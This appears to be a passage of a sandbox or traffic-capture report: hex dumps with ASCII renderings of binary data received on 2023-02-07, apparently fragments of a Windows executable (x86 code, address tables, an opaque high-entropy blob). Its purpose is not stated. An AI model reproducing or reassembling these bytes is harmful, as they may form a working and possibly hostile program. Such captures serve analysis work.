                                                                                    2023-02-07 18:45:04 UTC23INData Raw: 46 09 00 00 c9 c3 8b ff 55 8b ec ff 35 74 77 55 00 e8 ef 28 00 00 59 85 c0 74 03 5d ff e0 6a 02 e8 5d 28 00 00 59 5d e9 b2 fe ff ff 33 c0 50 50 50 50 50 e8 ce ff ff ff 83 c4 14 c3 8b ff 56 6a 01 68 34 c1 42 00 8b f1 e8 bb fa ff ff c7 06 54 14 40 00 8b c6 5e c3 8b ff 55 8b ec 83 ec 0c eb 0d ff 75 08 e8 0b 2f 00 00 59 85 c0 74 0f ff 75 08 e8 03 0a 00 00 59 85 c0 74 e6 c9 c3 f6 05 84 77 55 00 01 be 78 77 55 00 75 19 83 0d 84 77 55 00 01 8b ce e8 a3 ff ff ff 68 02 5e 41 00 e8 ab 2e 00 00 59 56 8d 4d f4 e8 0f e8 ff ff 68 20 7e 41 00 8d 45 f4 50 e8 01 00 00 00 cc 8b ff 55 8b ec 83 ec 20 8b 45 08 56 57 6a 08 59 be 00 15 40 00 8d 7d e0 f3 a5 89 45 f8 8b 45 0c 5f 89 45 fc 5e 85 c0 74 0c f6 00 08 74 07 c7 45 f4 00 40 99 01 8d 45 f4 50 ff 75 f0 ff 75 e4 ff 75 e0 ff
                                                                                    Data Ascii: FU5twU(Yt]j](Y]3PPPPPVjh4BT@^Uu/YtuYtwUxwUuwUh^A.YVMh ~AEPU EVWjY@}EE_E^ttE@EPuuu
                                                                                    2023-02-07 18:45:05 UTC31INData Raw: e8 77 f9 ff ff eb 17 ff 75 20 ff 75 1c ff 75 18 ff 75 10 ff 75 0c ff 75 08 e8 6e f8 ff ff 83 c4 18 5d c3 8b ff 55 8b ec 6a 00 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 5a ff ff ff 83 c4 1c 5d c3 8b ff 56 57 33 ff 8d b7 c0 c2 42 00 ff 36 e8 f1 08 00 00 83 c7 04 59 89 06 83 ff 28 72 e8 5f 5e c3 8b ff 56 68 00 00 03 00 68 00 00 01 00 33 f6 56 e8 ab 63 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 11 df ff ff 83 c4 14 5e c3 8b ff 55 8b ec 83 ec 18 dd 05 38 15 40 00 dd 5d f0 dd 05 30 15 40 00 dd 5d e8 dd 45 e8 dc 75 f0 dc 4d f0 dc 6d e8 dd 5d f8 d9 e8 dc 5d f8 df e0 f6 c4 05 7a 05 33 c0 40 c9 c3 33 c0 c9 c3 68 5c 15 40 00 ff 15 24 11 40 00 85 c0 74 15 68 40 15 40 00 50 ff 15 48 10 40 00 85 c0 74 05 6a 00 ff d0 c3 e9 99 ff ff ff 83 25 84 94 55 00
                                                                                    Data Ascii: wu uuuuun]UjuuuuuuZ]VW3B6Y(r_^Vhh3VctVVVVV^U8@]0@]EuMm]]z3@3h\@$@th@@PH@tj%U
                                                                                    2023-02-07 18:45:05 UTC39INData Raw: 03 01 00 00 74 31 8a cb 80 e9 61 80 f9 19 0f be cb 77 03 83 e9 20 83 c1 c9 3b 4d 14 73 19 83 4d 18 08 39 45 fc 72 27 75 04 3b ca 76 21 83 4d 18 04 83 7d 10 00 75 23 8b 45 18 4f a8 08 75 20 83 7d 10 00 74 03 8b 7d 0c 83 65 fc 00 eb 5b 8b 5d fc 0f af 5d 14 03 d9 89 5d fc 8a 1f 47 eb 8b be ff ff ff 7f a8 04 75 1b a8 01 75 3d 83 e0 02 74 09 81 7d fc 00 00 00 80 77 09 85 c0 75 2b 39 75 fc 76 26 e8 6e d1 ff ff f6 45 18 01 c7 00 22 00 00 00 74 06 83 4d fc ff eb 0f f6 45 18 02 6a 00 58 0f 95 c0 03 c6 89 45 fc 8b 45 10 85 c0 74 02 89 38 f6 45 18 02 74 03 f7 5d fc 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 8b 45 fc eb 18 8b 45 10 85 c0 74 02 89 30 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 33 c0 50 ff 75 10 ff 75 0c ff 75 08 39 05 00 82
                                                                                    Data Ascii: t1aw ;MsM9Er'u;v!M}u#EOu }t}e[]]]Guu=t}wu+9uv&nE"tMEjXEEt8Et]}tE`pEEt0}tE`p3[_^U3Puuu9
                                                                                    2023-02-07 18:45:05 UTC47INData Raw: 8d f0 fd ff ff 00 01 00 00 f7 85 f0 fd ff ff 00 90 00 00 8b da 8b f8 75 02 33 db 83 bd e8 fd ff ff 00 7d 0c c7 85 e8 fd ff ff 01 00 00 00 eb 1a 83 a5 f0 fd ff ff f7 b8 00 02 00 00 39 85 e8 fd ff ff 7e 06 89 85 e8 fd ff ff 8b c7 0b c3 75 06 21 85 d0 fd ff ff 8d 75 f3 8b 85 e8 fd ff ff ff 8d e8 fd ff ff 85 c0 7f 06 8b c7 0b c3 74 2d 8b 85 e0 fd ff ff 99 52 50 53 57 e8 60 3e 00 00 83 c1 30 83 f9 39 89 9d a0 fd ff ff 8b f8 8b da 7e 06 03 8d b8 fd ff ff 88 0e 4e eb bd 8d 45 f3 2b c6 46 f7 85 f0 fd ff ff 00 02 00 00 89 85 e0 fd ff ff 89 b5 e4 fd ff ff 74 61 85 c0 74 07 8b ce 80 39 30 74 56 ff 8d e4 fd ff ff 8b 8d e4 fd ff ff c6 01 30 40 eb 3e 49 66 39 30 74 06 40 40 3b ce 75 f4 2b 85 e4 fd ff ff d1 f8 eb 28 3b fe 75 0b a1 68 c7 42 00 89 85 e4 fd ff ff 8b 85 e4
                                                                                    Data Ascii: u3}9~u!ut-RPSW`>09~NE+Ftat90tV0@>If90t@@;u+(;uhB
                                                                                    2023-02-07 18:45:05 UTC55INData Raw: 1d c8 ff ff 59 83 65 fc 00 8d 46 6c 8b 3d 88 ce 42 00 e8 69 ff ff ff 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb c1 6a 0c e8 18 c7 ff ff 59 8b 75 e4 c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 dd 96 ff ff 8b 45 f0 83 b8 ac 00 00 00 01 7e 13 8d 45 f0 50 6a 04 ff 75 08 e8 3d 1e 00 00 83 c4 0c eb 10 8b 80 c8 00 00 00 8b 4d 08 0f b7 04 48 83 e0 04 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 83 3d 00 82 55 00 00 75 12 8b 45 08 8b 0d 78 ce 42 00 0f b7 04 41 83 e0 04 5d c3 6a 00 ff 75 08 e8 85 ff ff ff 59 59 5d c3 8b ff 55 8b ec 83 ec 18 53 56 ff 75 0c 8d 4d e8 e8 5c 96 ff ff 8b 5d 08 be 00 01 00 00 3b de 73 54 8b 4d e8 83 b9 ac 00 00 00 01 7e 14 8d 45 e8 50 6a 01 53 e8 b2 1d 00 00 8b 4d e8 83 c4 0c eb 0d 8b 81 c8 00 00 00 0f b7 04 58 83
                                                                                    Data Ascii: YeFl=BiEEjYuUuME~EPju=MH}tMapU=UuExBA]juYY]USVuM\];sTM~EPjSMX
                                                                                    2023-02-07 18:45:05 UTC62INData Raw: b7 45 fc 23 45 0c 80 7d f4 00 74 07 8b 4d f0 83 61 70 fd 5b c9 c3 cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 10 0b c8 8b 4c 24 0c 75 09 8b 44 24 04 f7 e1 c2 10 00 53 f7 e1 8b d8 8b 44 24 08 f7 64 24 14 03 d8 8b 44 24 08 f7 e1 03 d3 5b c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 44 24 14 0b c0 75 28 8b 4c 24 10 8b 44 24 0c 33 d2 f7 f1 8b d8 8b 44 24 08 f7 f1 8b f0 8b c3 f7 64 24 10 8b c8 8b c6 f7 64 24 10 03 d1 eb 47 8b c8 8b 5c 24 10 8b 54 24 0c 8b 44 24 08 d1 e9 d1 db d1 ea d1 d8 0b c9 75 f4 f7 f3 8b f0 f7 64 24 14 8b c8 8b 44 24 10 f7 e6 03 d1 72 0e 3b 54 24 0c 77 08 72 0f 3b 44 24 08 76 09 4e 2b 44 24 10 1b 54 24 14 33 db 2b 44 24 08 1b 54 24 0c f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 5e c2 10 00 8b ff 55 8b ec 8b 45 08 a3 30 82
                                                                                    Data Ascii: E#E}tMap[D$L$L$uD$SD$d$D$[VD$u(L$D$3D$d$d$G\$T$D$ud$D$r;T$wr;D$vN+D$T$3+D$T$^UE0
                                                                                    2023-02-07 18:45:05 UTC70INData Raw: 83 ce e0 46 83 65 08 00 33 d2 2b ce 42 d3 e2 8d 4c 85 e0 8b 31 8d 3c 16 3b fe 72 04 3b fa 73 07 c7 45 08 01 00 00 00 89 39 8b 4d 08 eb 1f 85 c9 74 1e 8d 4c 85 e0 8b 11 8d 72 01 33 ff 3b f2 72 05 83 fe 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d f0 83 c8 ff d3 e0 21 03 8b 45 f4 40 83 f8 03 7d 0d 6a 03 59 8d 7c 85 e0 2b c8 33 c0 f3 ab 8b 0d 54 d1 42 00 41 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 f4 00 83 65 08 00 83 cf ff 8b ca d3 e7 c7 45 fc 20 00 00 00 29 55 fc f7 d7 8b 5d 08 8d 5c 9d e0 8b 33 8b ce 23 cf 89 4d f0 8b ca d3 ee 8b 4d fc 0b 75 f4 89 33 8b 75 f0 d3 e6 ff 45 08 83 7d 08 03 89 75 f4 7c d3 8b f0 6a 02 c1 e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0 00 4a 83 e9 04 85 d2 7d e7
                                                                                    Data Ascii: Fe3+BL1<;r;sE9MtLr3;rs3G1HyM!E@}jY|+3TBAyJBeeE )U]\3#MMu3uE}u|jMZ+;|1tdJ}
                                                                                    2023-02-07 18:45:05 UTC78INData Raw: 59 e9 b7 01 00 00 83 3d 7c 94 55 00 03 0f 85 93 01 00 00 33 ff 89 7d e4 83 fe e0 0f 87 8a 01 00 00 6a 04 e8 39 6a ff ff 59 89 7d fc 53 e8 62 6a ff ff 59 89 45 e0 3b c7 0f 84 9e 00 00 00 3b 35 6c 94 55 00 77 49 56 53 50 e8 44 6f ff ff 83 c4 0c 85 c0 74 05 89 5d e4 eb 35 56 e8 13 72 ff ff 59 89 45 e4 3b c7 74 27 8b 43 fc 48 3b c6 72 02 8b c6 50 53 ff 75 e4 e8 93 31 ff ff 53 e8 12 6a ff ff 89 45 e0 53 50 e8 38 6a ff ff 83 c4 18 39 7d e4 75 48 3b f7 75 06 33 f6 46 89 75 0c 83 c6 0f 83 e6 f0 89 75 0c 56 57 ff 35 bc 77 55 00 ff 15 98 10 40 00 89 45 e4 3b c7 74 20 8b 43 fc 48 3b c6 72 02 8b c6 50 53 ff 75 e4 e8 3f 31 ff ff 53 ff 75 e0 e8 eb 69 ff ff 83 c4 14 c7 45 fc fe ff ff ff e8 2e 00 00 00 83 7d e0 00 75 31 85 f6 75 01 46 83 c6 0f 83 e6 f0 89 75 0c 56 53 6a
                                                                                    Data Ascii: Y=|U3}j9jY}SbjYE;;5lUwIVSPDot]5VrYE;t'CH;rPSu1SjESP8j9}uH;u3FuuVW5wU@E;t CH;rPSu?1SuiE.}u1uFuVSj
                                                                                    2023-02-07 18:45:05 UTC86INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:05 UTC94INData Raw: 00 00 00 2f 96 40 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 e9 98 40 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 f5 9a 40 00 00 00 00 00 b7 9a 40 00 c1 9a 40 00 fe ff ff ff 00 00 00 00 d8 ff ff ff 00 00 00 00 fe ff ff ff 9e 9b 40 00 a7 9b 40 00 40 00 00 00 00 00 00 00 00 00 00 00 85 9c 40 00 ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 4c 83 41 00 22 05 93 19 02 00 00 00 5c 83 41 00 01 00 00 00 6c 83 41 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 fe ff ff ff 00 00 00 00 b4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 bd 9d 40 00 00 00 00 00 2d 9d 40 00 36 9d 40 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00
                                                                                    Data Ascii: /@@@@@@@@@LA"\AlA@-@6@
                                                                                    2023-02-07 18:45:05 UTC101INData Raw: df 4d 77 22 41 60 f5 13 56 52 93 ce 1e ee e2 ed bd 70 9d 01 df 80 d5 bf bc 92 f7 66 87 66 e7 66 e9 a6 ae 53 90 35 42 82 91 42 bd c1 dd d8 7e 61 66 be ef 84 76 37 5f 7e b1 f9 e0 1b 00 4f 2a f2 f6 38 5e 1a a4 01 5f 00 e2 64 5b ac 98 dd c6 f9 34 01 ed 91 ff 9f 35 7c cf 2f 73 18 35 a6 5c 10 32 3d 21 22 4b 6e 62 54 16 d7 72 71 46 52 92 cf 36 72 ba 99 66 9d b9 0b a6 dd 22 3e 95 c3 ce 13 60 d9 dc fb 79 99 b8 ee 97 9c 86 11 d4 87 93 51 2b bc 3f e7 1f 91 b4 c4 45 9a 27 df a4 ff 7e 90 a8 e7 ea 81 e7 7d 33 e7 79 db c8 28 d7 94 f3 1b 4b ff 1f fd 40 ed c0 d2 25 9a 27 3a 24 39 3d 1f 75 a8 1a 78 db ce 9a f3 ac eb d6 4a 4f c4 cd f7 68 14 ca 29 9c 4e c0 6a 14 58 d1 46 b0 65 5a d9 47 79 8b 4d 12 00 12 5c 57 42 8f 16 b3 a7 7f e2 30 00 a7 61 b7 73 b4 fb 83 6b 8e 12 54 be 68
                                                                                    Data Ascii: Mw"A`VRpfffS5BB~afv7_~O*8^_d[45|/s5\2=!"KnbTrqFR6rf">`yQ+?E'~}3y(K@%':$9=uxJOh)NjXFeZGyM\WB0askTh
                                                                                    2023-02-07 18:45:05 UTC109INData Raw: 40 c8 84 9f 36 90 df b0 a7 2f a6 db 87 24 ab e5 0f 96 90 94 ee e7 aa b8 86 28 40 80 0a 3d 8b 48 76 93 a9 e0 d6 fc 40 ee f0 22 b8 f5 b8 d5 8b 43 5b 93 68 cc fb 81 46 7a ee e8 49 fd cd c8 0a 94 f1 3d d2 fb 60 6c 4b 64 8a a2 d3 13 39 c2 85 63 1b 44 96 b4 94 53 7d ab 00 73 4d 0f e6 cd c9 a8 5a b6 88 6b 48 f7 7d 50 19 c6 f1 5f 1e 61 7a 75 77 e1 36 30 b9 b3 f2 5f bd 04 d9 f5 ca 66 8b 35 b4 34 b9 fc 5d 8f bd 08 05 e2 14 90 ed 22 94 83 dc d0 19 0c 7b 19 c4 c7 fe 42 17 0d 48 0a 7b 8c 67 0a 25 b6 49 72 a4 97 51 f5 25 da 7d 7d 3e 3a 96 5c 5a be ae 2f 09 ac 76 00 37 78 ab df ad 0d 03 8e cf db 11 a4 3f b9 30 70 45 03 41 0a 5b 6a 08 a6 7f 30 c6 42 c7 8b 76 ba 0d 1f 46 ca dd fd 36 fe 0d c6 26 80 6d 90 dd af 8b 58 55 f0 f8 5b 0a f7 b6 ed 05 c6 15 7a a9 97 74 19 09 27 32
                                                                                    Data Ascii: @6/$(@=Hv@"C[hFzI=`lKd9cDS}sMZkH}P_azuw60_f54]"{BH{g%IrQ%}}>:\Z/v7x?0pEA[j0BvF6&mXU[zt'2
                                                                                    2023-02-07 18:45:05 UTC117INData Raw: b8 04 0f ec a6 78 fc 26 19 dd 43 cb 11 8a d0 ce c3 39 2c 7d 3d a0 aa 5a 85 0b 6b ae d5 be f0 c3 a1 e5 b4 6c 77 e8 51 43 1e f2 23 5c 9a 30 d2 71 50 c2 06 59 41 b3 56 bb 29 52 ec 05 9c 8a 9b a8 a0 cb 26 4d 3f 39 72 15 ab a2 2b d6 1e 73 82 ad 66 43 f1 f4 00 20 9e 5e ba f6 6d 54 5b 46 2c 71 22 b6 ac d8 e8 92 8b ca fe 2b 58 fd d3 55 5b 95 23 fb 49 9d 22 b1 37 9f 86 eb 49 83 c7 e6 7e bd 42 ee 2d 10 41 12 91 12 bb a8 94 c7 30 37 5e 1f 7e 02 43 a8 fc f6 b9 88 28 ac 2a 98 5e 83 a6 d0 bb 58 d1 0e b6 c5 05 84 e3 17 80 d1 09 c6 9f df a4 1d 50 55 54 5c 40 ef 23 85 b6 e0 a1 cf 37 b4 da 5e db fd 42 e3 93 35 3c 4c 85 07 74 59 93 f1 42 87 84 3f 22 56 92 77 ec 3e da 63 22 76 8f 4f 23 71 ed 30 83 f0 86 fb d6 02 d2 06 2c 9f 5b ec 7c 84 3e f3 58 45 91 19 0a 63 28 c1 37 ca 5f
                                                                                    Data Ascii: x&C9,}=ZklwQC#\0qPYAV)R&M?9r+sfC ^mT[F,q"+XU[#I"7I~B-A07^~C(*^XPUT\@#7^B5<LtYB?"Vw>c"vO#q0,[|>XEc(7_
                                                                                    2023-02-07 18:45:05 UTC125INData Raw: 05 75 21 9a d5 63 67 23 83 48 63 25 e0 32 2f f3 6b 83 2d 3b 1e 81 e1 4a 2a 36 a7 f0 3e 63 d6 52 99 f8 e6 fa 3f 07 e2 4a c5 92 da f0 36 ce cd 72 92 83 28 f8 18 3c 41 30 71 02 15 73 6d 27 2d 91 c3 e5 29 d7 b7 8e b5 03 b7 05 e5 93 d4 c7 2a 4c ec 21 25 a5 3d 86 41 91 57 0d 4c e9 77 fc 98 a9 bd fd 28 3b ac 82 14 0f ba 16 d1 35 d1 62 e0 71 4d bd 36 c4 83 7c ae c3 94 bc a1 97 22 07 40 fc 42 6f 84 19 3d 1e 12 51 0f fc 49 85 fa 2b da d7 76 b8 86 61 ab f1 d7 11 29 25 ee b5 69 35 99 dd 47 b9 cd f0 ab 13 8e a9 fe 44 9d 9a 32 1e a6 43 c0 4d 48 e7 23 0d a1 89 b3 a8 b4 1a c5 41 bd 0b 30 cf 9b 9a fb 4a ff 76 57 71 35 11 2e f4 f1 2c b8 7d 73 41 c6 21 74 76 2a e1 8d 3b 30 fb 17 94 db a9 10 00 b8 68 e2 65 14 f6 5d f2 70 f0 27 59 d6 a3 a9 4d 27 d8 fa 97 fc 45 78 ed ce 1d 3b
                                                                                    Data Ascii: u!cg#Hc%2/k-;J*6>cR?J6r(<A0qsm'-)*L!%=AWLw(;5bqM6|"@Bo=QI+va)%i5GD2CMH#A0JvWq5.,}sA!tv*;0he]p'YM'Ex;
                                                                                    2023-02-07 18:45:05 UTC133INData Raw: e2 4a fc d7 9a ac 4e 90 13 61 e1 49 b6 fb 25 73 6e 7e af 4d f9 d4 55 ac 39 5c ef c2 61 97 7b 72 99 4e 42 35 5b bb 01 58 af 23 99 44 97 f0 0f 66 9f 86 33 1e 40 74 d1 18 cb 56 ea ca 7b d1 52 24 02 68 ab dd 5e ab e7 d3 81 cc 6a 17 0e 30 25 5a 90 10 d6 62 fd 25 ef 6c fb 18 36 36 ac bd 2e 8c 00 25 63 fe 07 90 35 bc 02 ba 5d 31 32 ab d0 51 0a 79 4f 59 e9 91 e8 26 4e 8b 4f 34 78 ee 56 07 2b 86 84 a5 95 f9 c2 4f 7a e5 c0 c8 58 39 81 83 e0 fc 1e d7 58 7d 67 fb 91 9d ab a8 57 15 63 52 aa 56 35 0a da 3a 21 c9 c0 ba 0c 4f 75 a6 60 be ba 20 0c 18 14 da ac 79 f1 76 8d 81 de 1f 04 72 9a 8f 88 8a 2f 70 21 49 10 5d e4 5b 64 1b aa 9d 6a 5d 37 e5 1b 1a c5 ec 74 ac 81 35 62 ea 98 a6 9f 58 c0 5f e0 8c 72 5d f3 5c c2 66 7e 0b fa f1 53 9a 7b ba 22 6f 66 9f 8b 4c a9 4c e7 4b e8
                                                                                    Data Ascii: JNaI%sn~MU9\a{rNB5[X#Df3@tV{R$h^j0%Zb%l66.%c5]12QyOY&NO4xV+OzX9X}gWcRV5:!Ou` yvr/p!I][dj]7t5bX_r]\f~S{"ofLLK
                                                                                    2023-02-07 18:45:05 UTC140INData Raw: 1e fa 08 8d 3a 7b df 5a f6 33 07 ff 28 fd d0 6b a0 79 d4 f3 77 51 d3 84 0a 6f 7a a6 b3 12 9e 1c 23 cf f5 a4 3e c9 6e ee c2 d9 2e fa cd 30 72 1c fa a7 b0 64 cf 57 c6 c2 d5 53 f0 89 1b f5 45 6b ff c1 4f a8 81 7b a9 fc 0b f0 6f 32 a6 c6 76 a1 6e 37 2d 07 d0 a2 09 6a 9a 64 61 3a ef 08 2b 63 94 41 1d f1 32 45 29 76 f8 2d d8 f0 c3 e4 9a 5b 14 20 1c 17 8e dd ef 0a 68 eb c8 60 47 a1 4a c3 a3 f8 c1 3a 69 72 48 c5 1a 8e 88 a5 18 19 df 85 97 16 1a 8b 6b a2 ff e6 9b 7b 6f 21 79 55 5d 39 f9 65 69 a8 1c 6a 2b e3 06 ab 9a 6a 66 22 3c 95 8c 70 77 23 98 96 2a 4c 90 d5 0c b2 a6 08 22 13 ad 58 54 80 d0 d1 a8 a6 69 d2 e6 57 1d 83 b8 28 60 45 50 06 5a 1d c6 e5 48 8a 46 09 c2 86 82 d6 ad cc 5b 1e d4 ed 66 91 94 7d ee ee 06 ce da 48 5f 3f ab b8 66 43 9e 9c 1e a0 e9 a5 c6 9c e8
                                                                                    Data Ascii: :{Z3(kywQoz#>n.0rdWSEkO{o2vn7-jda:+cA2E)v-[ h`GJ:irHk{o!yU]9eij+jf"<pw#*L"XTiW(`EPZHF[f}H_?fC
                                                                                    2023-02-07 18:45:05 UTC148INData Raw: d5 c9 73 50 fc c5 b3 3f 69 fb ec 64 45 a9 7b b3 b5 61 4f 65 70 58 7f 22 ad fe 3c 70 7e d8 35 5c 14 67 e4 6e 91 fd 6d 36 76 ea 85 d5 05 2b b3 a2 b5 7a 12 d4 ea eb cb b7 e3 6f aa a5 5f 2b 2c 74 cc 93 24 21 ec 50 a3 0e 4a b4 eb e9 a2 72 fd 5b 10 c3 30 8f 1b a6 17 60 94 a5 e0 4d 11 11 99 cc da 38 44 82 b4 81 57 60 2e 6e 93 59 07 be 4b 88 0b b4 ed d4 93 77 fe 9c 3d d2 89 f9 bb 94 96 15 fd da 02 65 47 a4 de 32 fb ee e8 b9 00 6b 4b 59 4b 57 51 bf 72 47 1e ab 5b 0f 1b 36 24 27 51 a4 0f e4 75 7f e2 4b 05 fc 91 bc f9 6e c2 c8 da b9 88 31 bb 36 0b d5 af 79 65 e6 7b 5c d6 76 ac 4c 1c 98 8a 92 54 9c 7d 66 32 23 ed f9 80 76 ea 94 1d 0c c4 9d 4e df fc 5f 52 20 ef 1d 6a 25 2c 16 35 da 8d fb e0 a3 90 63 42 55 08 af fc 8b d6 20 3c d3 e7 4f 5b b3 73 f8 56 72 2d 87 d7 a9 a1
                                                                                    Data Ascii: sP?idE{aOepX"<p~5\gnm6v+zo_+,t$!PJr[0`M8DW`.nYKw=eG2kKYKWQrG[6$'QuKn16ye{\vLT}f2#vN_R j%,5cBU <O[sVr-
                                                                                    2023-02-07 18:45:05 UTC156INData Raw: aa 27 88 c5 fb 68 8e ad d3 d8 4c f2 02 40 0c 02 0b d0 8a 55 71 9c 51 cf 4c bf 8c 3b 29 16 fa 93 3a ef b0 c7 4a e3 be cd f3 4a a5 77 09 d7 9d 74 c0 91 d3 63 ba c1 7d aa ce a4 b9 08 c4 dc 5a 19 75 2b 80 ce ad 06 fb 84 ea 5f 86 0b 58 9b ed 9b 91 16 d5 96 1b 0c 75 64 8e 92 67 52 bc 8e b5 1e ab a0 b3 e4 0f 9d 0d 77 f6 96 05 ae 40 c6 5a cb 3e fc 86 2b 4a b6 5f ba ca 35 3e d8 96 5a 86 5e d6 0a 3a 79 82 24 0e 1d 52 65 2d 16 db aa 2d 59 2f 5c 9b 1b b9 a0 23 21 d1 7a 4d 99 c8 86 b6 f6 e0 47 85 5a c7 91 b7 49 7f 0b 83 49 fc 27 1b d5 6a ed 7e 17 fc ff ea ff 3a a4 27 52 68 9b b3 ea 72 fb 83 6c ef e7 29 2c cc a4 8f ac 71 92 69 67 8a 53 8d 09 5e de 9a 9b b0 58 42 6c 14 cf bf 5e 25 83 1b f1 63 bd 09 38 a0 2f 1c ec 70 1e 7a 7b f1 6f 22 08 05 ae db 16 63 77 70 57 9f 25 d0
                                                                                    Data Ascii: 'hL@UqQL;):JJwtc}Zu+_XudgRw@Z>+J_5>Z^:y$Re--Y/\#!zMGZII'j~:'Rhrl),qigS^XBl^%c8/pz{o"cwpW%
                                                                                    2023-02-07 18:45:05 UTC164INData Raw: e8 ee 9c 59 21 1e b7 5f d8 9f f5 7b b8 c0 60 f0 e9 39 71 a0 a7 94 e3 58 cf dc 9b 08 82 00 bf 5c c2 c5 3c 61 72 6c ed 4b 7e a3 c5 da 87 93 db 8b 8f c4 72 d2 1a 03 71 88 ea 22 82 89 76 e7 6e c7 3d 16 39 43 e0 67 be a7 4d 7c 45 02 83 7b 21 e8 21 78 66 ad 8a 36 8c 01 81 aa 80 c0 b4 f2 09 a3 69 bb 9a 4a f9 04 dc 1d 85 11 0f e9 e6 81 3a 8d 54 9e 27 4d e9 d9 46 de cd ad 97 f7 60 32 9c 50 ee b2 5f b0 c0 77 5a a7 09 5d 6b 92 c6 ba fe 86 a3 42 cc 0e 41 bb b9 f4 ea fa 4d 32 07 0e da 92 a8 86 be 40 16 88 0f 8c 85 e3 86 ec 60 86 b5 38 99 b8 d9 09 2d e1 75 19 d5 f6 56 3b f1 2c d5 9a 4f 42 64 c2 7c 3b 68 1e d1 c6 91 26 04 70 9f 63 94 fe fd 18 e8 99 0a 45 87 61 79 af 02 24 1b 92 44 dd 8e 15 73 09 71 3e 87 d6 7c 1d 88 9d ed b2 c5 72 cb d9 17 8a 3d 76 29 eb 43 da 29 ef 9a
                                                                                    Data Ascii: Y!_{`9qX\<arlK~rq"vn=9CgM|E{!!xf6iJ:T'MF`2P_wZ]kBAM2@`8-uV;,OBd|;h&pcEay$Dsq>|r=v)C)
                                                                                    2023-02-07 18:45:05 UTC172INData Raw: 00 00 00 00 00 00 00 4c 1f 40 00 3c 1f 40 00 75 cd 40 00 00 00 00 00 02 00 00 00 08 25 40 00 08 00 00 00 dc 24 40 00 09 00 00 00 b0 24 40 00 0a 00 00 00 18 24 40 00 10 00 00 00 ec 23 40 00 11 00 00 00 bc 23 40 00 12 00 00 00 98 23 40 00 13 00 00 00 6c 23 40 00 18 00 00 00 34 23 40 00 19 00 00 00 0c 23 40 00 1a 00 00 00 d4 22 40 00 1b 00 00 00 9c 22 40 00 1c 00 00 00 74 22 40 00 1e 00 00 00 54 22 40 00 1f 00 00 00 f0 21 40 00 20 00 00 00 b8 21 40 00 21 00 00 00 c0 20 40 00 22 00 00 00 20 20 40 00 78 00 00 00 10 20 40 00 79 00 00 00 00 20 40 00 7a 00 00 00 f0 1f 40 00 fc 00 00 00 ec 1f 40 00 ff 00 00 00 dc 1f 40 00 03 00 00 00 07 00 00 00 78 00 00 00 0a 00 00 00 ff ff ff ff 80 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: L@<@u@%@$@$@$@#@#@#@l#@4#@#@"@"@t"@T"@!@ !@! @" @x @y @z@@@x
                                                                                    2023-02-07 18:45:05 UTC180INData Raw: dd c3 f1 e6 b1 7d f1 e5 a9 74 f2 e5 9b 6f e8 e0 9f 69 f4 e7 ad 64 e8 e5 a3 72 e7 e6 a6 6e f5 e0 9f 73 e8 e3 ab 6b ea e3 a9 72 eb e4 a5 6d e7 ef a4 63 f6 e6 a5 74 f5 e2 9d 6a ec e3 a1 6c ef ec ab 7a e3 ec da b6 e8 ec d8 b6 f2 b3 7d 66 ee 9a 83 36 77 e2 e5 b1 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc f5 ab 24 94 7e 34 77 b2 89 6c ea e6 d9 ca ed e6 de c6 ed e9 a8 77 ec e4 a9 68 f1 e5 a4 64 f7 e1 a8 6c e6 e6 a6 6e e7 ed ac 6d f2 de ab 74 eb f0 a5 75 eb e2 a3 74 ea ea 9f 75 eb e6 a0 6e e9 e5 aa 6e e5 e5 a7 6d e8 e1 a5 72 f5 e3 a8 6a ee eb ad 7e f6 ed d9 b7 e3 e4 da b2 f0 bb 8c 66 ec ae 7e 4a 78 e9 e3 ab 30 fb e6 ac 14 